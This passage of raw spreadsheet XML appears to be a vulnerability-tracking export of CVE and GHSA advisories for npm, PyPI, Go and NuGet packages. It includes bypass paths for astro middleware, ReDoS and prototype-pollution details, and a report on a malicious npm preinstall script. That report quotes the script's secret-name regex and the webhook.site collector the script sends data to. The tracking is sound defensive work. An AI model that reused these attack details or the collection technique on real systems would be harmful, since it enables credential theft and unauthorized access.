t="inlineStr"><is><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is></c><c r="T1639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t></is></c></row><row r="1640"><c r="A1640" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1640" s="5" t="inlineStr"><is><t>CVE-2026-84376</t></is></c><c r="D1640" s="5" t="inlineStr" /><c r="E1640" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1640" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1640" s="5" t="inlineStr" /><c r="H1640" s="5" t="n"><v>0.004</v></c><c r="I1640" s="5" t="inlineStr" /><c r="J1640" s="5" t="inlineStr" /><c r="K1640" s="5" t="inlineStr" /><c r="L1640" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1640" s="5" t="inlineStr"><is><t>7.2.4</t></is></c><c r="N1640" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1640" s="5" t="inlineStr" /><c r="R1640" s="5" t="inlineStr" /><c r="S1640" s="5" t="inlineStr"><is><t>## Summary

Astro stripped a configured `base` path from request pathnames using a string-prefix check that did not verify a path-segment boundary. With `base: "/app"`, a request to `/appX/admin` was treated as being under the base and resolved internally to the `/admin` route, while middleware still observed the public pathname `/appX/admin`. Middleware that authorizes routes by inspecting `context.url.pathname` could therefore be bypassed.

## Impact

An unauthenticated remote attacker can bypass pathname-based middleware authorization in applications that:

- Configure a non-root `base`.
- Protect base-prefixed routes in middleware using `context.url.pathname`.

Because routing and middleware resolved different effective pathnames, a request such as `/appX/admin` (or other single-character extensions like `/app2/admin` or `/app-/admin`) reached the protected `/admin` route without passing the middleware check that guards `/app/admin`. Astro's authentication guide demonstrates protecting routes in middleware via `context.url.pathname`, so this is a reasonable and expected pattern.

## Affected versions

`astro` &lt;= 7.2.3.

## Patches

Fixed in `astro` 7.2.4. Base stripping now requires the pathname to equal the base without its trailing slash, or to be followed by a `/`, so a prefix that does not end on a path-segment boundary is no longer treated as being under the base. Routing and `context.url.pathname` now resolve the same pathname.

## Workarounds

Upgrade to `astro` 7.2.4 or later. As a mitigation before upgrading, avoid relying solely on prefix checks of `context.url.pathname` for authorization, or reject requests whose pathname does not begin with the configured base followed by a path-segment boundary.

## Credits

Reported by @Ryoga-exe.</t></is></c><c r="T1640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t></is></c></row><row r="1641"><c r="A1641" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1641" s="5" t="inlineStr"><is><t>CVE-2026-84378</t></is></c><c r="D1641" s="5" t="inlineStr" /><c r="E1641" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1641" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1641" s="5" t="inlineStr" /><c r="H1641" s="5" t="n"><v>0.003</v></c><c r="I1641" s="5" t="inlineStr" /><c r="J1641" s="5" t="inlineStr" /><c r="K1641" s="5" t="inlineStr" /><c r="L1641" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1641" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N1641" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1641" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1641" s="5" t="inlineStr" /><c r="R1641" s="5" t="inlineStr" /><c r="S1641" s="5" t="inlineStr"><is><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is></c><c r="T1641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t></is></c></row><row r="1642"><c r="A1642" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1642" s="5" t="inlineStr"><is><t>CVE-2026-84379</t></is></c><c r="D1642" s="5" t="inlineStr" /><c r="E1642" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1642" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1642" s="5" t="inlineStr" /><c r="H1642" s="5" t="n"><v>0.003</v></c><c r="I1642" s="5" t="inlineStr" /><c r="J1642" s="5" t="inlineStr" /><c r="K1642" s="5" t="inlineStr" /><c r="L1642" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1642" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1642" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1642" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1642" s="5" t="inlineStr" /><c r="R1642" s="5" t="inlineStr" /><c r="S1642" s="5" t="inlineStr"><is><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is></c><c r="T1642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t></is></c></row><row r="1643"><c r="A1643" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1643" s="5" t="inlineStr"><is><t>CVE-2026-84380</t></is></c><c r="D1643" s="5" t="inlineStr" /><c r="E1643" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1643" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1643" s="5" t="inlineStr" /><c r="H1643" s="5" t="n"><v>0.002</v></c><c r="I1643" s="5" t="inlineStr" /><c r="J1643" s="5" t="inlineStr" /><c r="K1643" s="5" t="inlineStr" /><c r="L1643" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1643" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1643" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1643" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1643" s="5" t="inlineStr" /><c r="R1643" s="5" t="inlineStr" /><c r="S1643" s="5" t="inlineStr"><is><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is></c><c r="T1643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t></is></c></row><row r="1644"><c r="A1644" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1644" s="5" t="inlineStr"><is><t>CVE-2026-84381</t></is></c><c r="D1644" s="5" t="inlineStr" /><c r="E1644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1644" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1644" s="5" t="inlineStr" /><c r="H1644" s="5" t="n"><v>0.001</v></c><c r="I1644" s="5" t="inlineStr" /><c r="J1644" s="5" t="inlineStr" /><c r="K1644" s="5" t="inlineStr" /><c r="L1644" s="5" t="inlineStr"><is><t>PyPI:httpcore2, PyPI:httpx2</t></is></c><c r="M1644" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N1644" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1644" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1644" s="5" t="inlineStr" /><c r="R1644" s="5" t="inlineStr" /><c r="S1644" s="5" t="inlineStr"><is><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is></c><c r="T1644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t></is></c></row><row r="1645"><c r="A1645" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1645" s="5" t="inlineStr"><is><t>CVE-2026-84382</t></is></c><c r="D1645" s="5" t="inlineStr" /><c r="E1645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1645" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1645" s="5" t="inlineStr" /><c r="H1645" s="5" t="n"><v>0.004</v></c><c r="I1645" s="5" t="inlineStr" /><c r="J1645" s="5" t="inlineStr" /><c r="K1645" s="5" t="inlineStr" /><c r="L1645" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1645" s="5" t="inlineStr"><is><t>2.12.0</t></is></c><c r="N1645" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1645" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1645" s="5" t="inlineStr" /><c r="R1645" s="5" t="inlineStr" /><c r="S1645" s="5" t="inlineStr"><is><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is></c><c r="T1645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t></is></c></row><row r="1646"><c r="A1646" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1646" s="5" t="inlineStr"><is><t>CVE-2026-84445</t></is></c><c r="D1646" s="5" t="inlineStr" /><c r="E1646" s="5" t="inlineStr" /><c r="F1646" s="5" t="inlineStr" /><c r="G1646" s="5" t="inlineStr" /><c r="H1646" s="5" t="n"><v>0.007</v></c><c r="I1646" s="5" t="inlineStr" /><c r="J1646" s="5" t="inlineStr" /><c r="K1646" s="5" t="inlineStr" /><c r="L1646" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M1646" s="5" t="inlineStr"><is><t>1.82.2, 1.83.2, 1.85.0-dev.0.20260825072537-93e31b48545e</t></is></c><c r="N1646" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1646" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1646" s="5" t="inlineStr" /><c r="R1646" s="5" t="inlineStr" /><c r="S1646" s="5" t="inlineStr"><is><t>A vulnerability exists in gRPC-Go servers configured with `xds.NewGRPCServer()` where a crafted request missing both `:authority` and `Host` headers can cause a server panic, resulting in a Denial of Service (DoS).

Servers built with `xds.NewGRPCServer` install an xDS routing interceptor on every RPC. This interceptor looks up the request’s `:authority` header to pick a virtual host. The HTTP/2 server transport previously accepted requests that had neither `:authority` nor `Host`. When this happened, the xDS routing interceptor attempted to access the first element of an empty slice of authorities, leading to an index out of bounds panic. Since the per-RPC goroutine does not recover from panics, the entire server process would terminate.

This panic occurs in the interceptor pipeline, meaning the transport credentials handshake (TLS, mTLS, or ALTS) and HTTP/2 connection establishment must complete successfully before the crafted request can reach this logic.
- Insecure/Standard TLS: If the server permits insecure (plaintext) connections or standard credentials (where client certs are not checked), any unauthenticated remote attacker can trigger the crash.
- mTLS / ALTS: If strict transport-level authentication is enforced at the network edge or transport layer (e.g., requiring a valid client certificate), the attacker must possess valid transport credentials to initiate the stream and trigger the panic.

### Impact
An attacker can cause a complete outage of the gRPC server by sending a request missing both `:authority` and `Host` headers, provided they can successfully establish a transport connection.

### Patches
The issue has been addressed in `master` (and backported to `1.83.2` and `1.82.2`). The fix updates the HTTP/2 transport layer to reject requests missing both `:authority` and `Host` headers early, maintaining consistency with and other gRPC language implementations.</t></is></c><c r="T1646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84445</t></is></c></row><row r="1647"><c r="A1647" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1647" s="5" t="inlineStr"><is><t>CVE-2026-84452</t></is></c><c r="D1647" s="5" t="inlineStr" /><c r="E1647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1647" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1647" s="5" t="inlineStr" /><c r="H1647" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1647" s="5" t="inlineStr" /><c r="J1647" s="5" t="inlineStr" /><c r="K1647" s="5" t="inlineStr" /><c r="L1647" s="5" t="inlineStr"><is><t>PyPI:winml-cli</t></is></c><c r="M1647" s="5" t="inlineStr"><is><t>0.4.0</t></is></c><c r="N1647" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1647" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1647" s="5" t="inlineStr" /><c r="R1647" s="5" t="inlineStr" /><c r="S1647" s="5" t="inlineStr"><is><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is></c><c r="T1647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t></is></c></row><row r="1648"><c r="A1648" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1648" s="5" t="inlineStr"><is><t>CVE-2026-85061</t></is></c><c r="D1648" s="5" t="inlineStr" /><c r="E1648" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1648" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1648" s="5" t="inlineStr" /><c r="H1648" s="5" t="n"><v>0.003</v></c><c r="I1648" s="5" t="inlineStr" /><c r="J1648" s="5" t="inlineStr" /><c r="K1648" s="5" t="inlineStr" /><c r="L1648" s="5" t="inlineStr"><is><t>npm:maplibre-gl</t></is></c><c r="M1648" s="5" t="inlineStr"><is><t>6.4.1</t></is></c><c r="N1648" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1648" s="5" t="inlineStr" /><c r="R1648" s="5" t="inlineStr" /><c r="S1648" s="5" t="inlineStr"><is><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is></c><c r="T1648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t></is></c></row><row r="1649"><c r="A1649" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1649" s="5" t="inlineStr"><is><t>CVE-2026-85062</t></is></c><c r="D1649" s="5" t="inlineStr" /><c r="E1649" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1649" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1649" s="5" t="inlineStr" /><c r="H1649" s="5" t="n"><v>0.003</v></c><c r="I1649" s="5" t="inlineStr" /><c r="J1649" s="5" t="inlineStr" /><c r="K1649" s="5" t="inlineStr" /><c r="L1649" s="5" t="inlineStr"><is><t>npm:colord</t></is></c><c r="M1649" s="5" t="inlineStr"><is><t>2.9.4</t></is></c><c r="N1649" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1649" s="5" t="inlineStr" /><c r="R1649" s="5" t="inlineStr" /><c r="S1649" s="5" t="inlineStr"><is><t>### Impact

`colord`'s CSS color string matchers described a number as `([+-]?\d*\.?\d+)`. In that form `\d*` and `\d+` can match the same digits, so a run of *n* digits can be divided between them in O(n²) ways, and rejecting an input retries every division. Parsing is synchronous and uninterruptible, so a long malformed color string blocks the thread:

| input | time to reject |
| --- | --- |
| 16 KB | 224 ms |
| 64 KB | 4.4 s |
| 128 KB | 18.5 s |

Reachable through `colord()` and `getFormat()`, and through any method that accepts a color string — including `isEqual()`, `mix()` and `contrast()`. The affected matchers are `parseRgbaString` and `parseHslaString` (built in) and `parseHwbaString`, `parseLchaString`, `parseCmykaString` (plugins).

Growth is polynomial, not exponential — multi-kilobyte payloads are required for a noticeable stall.

### Who is affected

Applications that pass attacker-controlled strings of unbounded length to `colord()` — for example a server validating a color taken from a request body, JSON field, or uploaded stylesheet. `colord` applies no length limit before matching.

Typical client-side use with short input is not meaningfully affected.

### Patches

Fixed in **2.9.4**. The number is now written as `([+-]?(?:\d*\.\d+|\d+))`, which accepts exactly the same syntax but leaves only one way to match it, making rejection linear — 1 MB of input is rejected in ~5 ms.

### Workarounds

Reject or truncate color strings longer than a sane limit (e.g. 100 characters) before passing them to `colord`.</t></is></c><c r="T1649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t></is></c></row><row r="1650"><c r="A1650" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1650" s="5" t="inlineStr"><is><t>CVE-2026-85063</t></is></c><c r="D1650" s="5" t="inlineStr" /><c r="E1650" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1650" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1650" s="5" t="inlineStr" /><c r="H1650" s="5" t="n"><v>0.003</v></c><c r="I1650" s="5" t="inlineStr" /><c r="J1650" s="5" t="inlineStr" /><c r="K1650" s="5" t="inlineStr" /><c r="L1650" s="5" t="inlineStr"><is><t>npm:csv-parse</t></is></c><c r="M1650" s="5" t="inlineStr"><is><t>7.0.2</t></is></c><c r="N1650" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1650" s="5" t="inlineStr" /><c r="R1650" s="5" t="inlineStr" /><c r="S1650" s="5" t="inlineStr"><is><t>### Impact
With columns: true and group_columns_by_name: true, a duplicated __proto__  header causes the duplicate-column branch to assign an array to obj['__proto__'], invoking the __proto__ setter and replacing the parsed record object's prototype with attacker-controlled data. Fixed in 7.0.2 (Object.hasOwn duplicate check + Object.defineProperty assignment).

### Patches
The problem been patched.

### Workarounds
Disable usage of both the columns and  group_columns_by_name options.

### References
issue #496, PR #497</t></is></c><c r="T1650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t></is></c></row><row r="1651"><c r="A1651" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1651" s="5" t="inlineStr"><is><t>CVE-2026-86477</t></is></c><c r="D1651" s="5" t="inlineStr" /><c r="E1651" s="5" t="inlineStr" /><c r="F1651" s="5" t="inlineStr" /><c r="G1651" s="5" t="inlineStr" /><c r="H1651" s="5" t="inlineStr" /><c r="I1651" s="5" t="inlineStr" /><c r="J1651" s="5" t="inlineStr" /><c r="K1651" s="5" t="inlineStr" /><c r="L1651" s="5" t="inlineStr" /><c r="M1651" s="5" t="inlineStr" /><c r="N1651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1651" s="5" t="inlineStr" /><c r="R1651" s="5" t="inlineStr" /><c r="S1651" s="5" t="inlineStr"><is><t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.</t></is></c><c r="T1651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86477</t></is></c></row><row r="1652"><c r="A1652" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1652" s="5" t="inlineStr"><is><t>GHSA-26w7-cxv4-gfx2</t></is></c><c r="D1652" s="5" t="inlineStr" /><c r="E1652" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1652" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1652" s="5" t="inlineStr" /><c r="H1652" s="5" t="inlineStr" /><c r="I1652" s="5" t="inlineStr" /><c r="J1652" s="5" t="inlineStr" /><c r="K1652" s="5" t="inlineStr" /><c r="L1652" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1652" s="5" t="inlineStr"><is><t>7.2.8</t></is></c><c r="N1652" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1652" s="5" t="inlineStr" /><c r="R1652" s="5" t="inlineStr" /><c r="S1652" s="5" t="inlineStr"><is><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is></c><c r="T1652" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2</t></is></c></row><row r="1653"><c r="A1653" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1653" s="5" t="inlineStr"><is><t>GHSA-2q42-4q24-7rgv</t></is></c><c r="D1653" s="5" t="inlineStr" /><c r="E1653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1653" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1653" s="5" t="inlineStr" /><c r="H1653" s="5" t="inlineStr" /><c r="I1653" s="5" t="inlineStr" /><c r="J1653" s="5" t="inlineStr" /><c r="K1653" s="5" t="inlineStr" /><c r="L1653" s="5" t="inlineStr"><is><t>npm:@typespec/compiler, npm:@typespec/openapi3</t></is></c><c r="M1653" s="5" t="inlineStr" /><c r="N1653" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1653" s="5" t="inlineStr" /><c r="R1653" s="5" t="inlineStr" /><c r="S1653" s="5" t="inlineStr"><is><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is></c><c r="T1653" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv</t></is></c></row><row r="1654"><c r="A1654" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1654" s="5" t="inlineStr"><is><t>GHSA-2x7j-588g-ccc2</t></is></c><c r="D1654" s="5" t="inlineStr" /><c r="E1654" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1654" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1654" s="5" t="inlineStr" /><c r="H1654" s="5" t="inlineStr" /><c r="I1654" s="5" t="inlineStr" /><c r="J1654" s="5" t="inlineStr" /><c r="K1654" s="5" t="inlineStr" /><c r="L1654" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1654" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1654" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1654" s="5" t="inlineStr" /><c r="R1654" s="5" t="inlineStr" /><c r="S1654" s="5" t="inlineStr"><is><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is></c><c r="T1654" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2x7j-588g-ccc2</t></is></c></row><row r="1655"><c r="A1655" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1655" s="5" t="inlineStr"><is><t>GHSA-2xp9-vwfh-vxw4</t></is></c><c r="D1655" s="5" t="inlineStr" /><c r="E1655" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1655" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1655" s="5" t="inlineStr" /><c r="H1655" s="5" t="inlineStr" /><c r="I1655" s="5" t="inlineStr" /><c r="J1655" s="5" t="inlineStr" /><c r="K1655" s="5" t="inlineStr" /><c r="L1655" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M1655" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N1655" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1655" s="5" t="inlineStr" /><c r="R1655" s="5" t="inlineStr" /><c r="S1655" s="5" t="inlineStr"><is><t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.

Until a fix has propagated, optimization of AVIF files is disabled.</t></is></c><c r="T1655" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4</t></is></c></row><row r="1656"><c r="A1656" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1656" s="5" t="inlineStr"><is><t>GHSA-38hw-f37p-99jj</t></is></c><c r="D1656" s="5" t="inlineStr" /><c r="E1656" s="5" t="inlineStr" /><c r="F1656" s="5" t="inlineStr" /><c r="G1656" s="5" t="inlineStr" /><c r="H1656" s="5" t="inlineStr" /><c r="I1656" s="5" t="inlineStr" /><c r="J1656" s="5" t="inlineStr" /><c r="K1656" s="5" t="inlineStr" /><c r="L1656" s="5" t="inlineStr"><is><t>npm:i18nexus</t></is></c><c r="M1656" s="5" t="inlineStr" /><c r="N1656" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1656" s="5" t="inlineStr" /><c r="R1656" s="5" t="inlineStr" /><c r="S1656" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: ghsa-malware (37d8dfb4ceaec110414441ebad5da37dad342ef653a20499504385d9db1ffdac)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56" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16045</t></is></c></row><row r="1657"><c r="A1657" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1657" s="5" t="inlineStr"><is><t>GHSA-3j7p-44mj-76hx</t></is></c><c r="D1657" s="5" t="inlineStr" /><c r="E1657" s="5" t="inlineStr" /><c r="F1657" s="5" t="inlineStr" /><c r="G1657" s="5" t="inlineStr" /><c r="H1657" s="5" t="inlineStr" /><c r="I1657" s="5" t="inlineStr" /><c r="J1657" s="5" t="inlineStr" /><c r="K1657" s="5" t="inlineStr" /><c r="L1657" s="5" t="inlineStr"><is><t>npm:krdpass-auth-react-native</t></is></c><c r="M1657" s="5" t="inlineStr" /><c r="N1657" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1657" s="5" t="inlineStr" /><c r="R1657" s="5" t="inlineStr" /><c r="S1657" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3a74ab9e45d4f67b40e21dc7491aff1979b4bf79be24bc49b8588916c18b847f)
package.json declares a preinstall script (preinstall.js) that runs automatically on `npm install`. The script collects os.hostname(), os.userInfo(), homedir, internal IP addresses, CI/repository identifiers (GITHUB_REPOSITORY, CI_PROJECT_PATH, JENKINS_URL, etc.), parent package.json metadata, and enumerates process.env keys matching /(TOKEN|KEY|SECRET|PASS|AUTH|CRED|AWS|AZURE|GCP|NPM|GITHUB|GITLAB|API)/i, then POSTs the payload to a hardcoded anonymous collector at https://webhook.site/5ba4d4a7-b977-4bb8-b26e-517b46271316. Bulk env-name enumeration and internal-network / CI-identifier collection are outside any documented purpose of a React Native auth library and disclose to a remote party which credentials exist on the installer or CI runner and how the host is situated. The manifest additionally lists the package's own name (krdpass-auth-react-native ^1.6.0) as one of its dependencies, causing npm to resolve and execute the lifecycle hooks of future self-published versions during install.

## Source: ghsa-malware (802615c8d05ade7426df3338956dc9f1e50c4bfdbb4890b873a978859fa2a537)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57" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16042</t></is></c></row><row r="1658"><c r="A1658" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1658" s="5" t="inlineStr"><is><t>GHSA-4qhr-qf46-fcrx</t></is></c><c r="D1658" s="5" t="inlineStr" /><c r="E1658" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1658" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1658" s="5" t="inlineStr" /><c r="H1658" s="5" t="inlineStr" /><c r="I1658" s="5" t="inlineStr" /><c r="J1658" s="5" t="inlineStr" /><c r="K1658" s="5" t="inlineStr" /><c r="L1658" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1658" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1658" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1658" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1658" s="5" t="inlineStr" /><c r="R1658" s="5" t="inlineStr" /><c r="S1658" s="5" t="inlineStr"><is><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is></c><c r="T1658" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx</t></is></c></row><row r="1659"><c r="A1659" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1659" s="5" 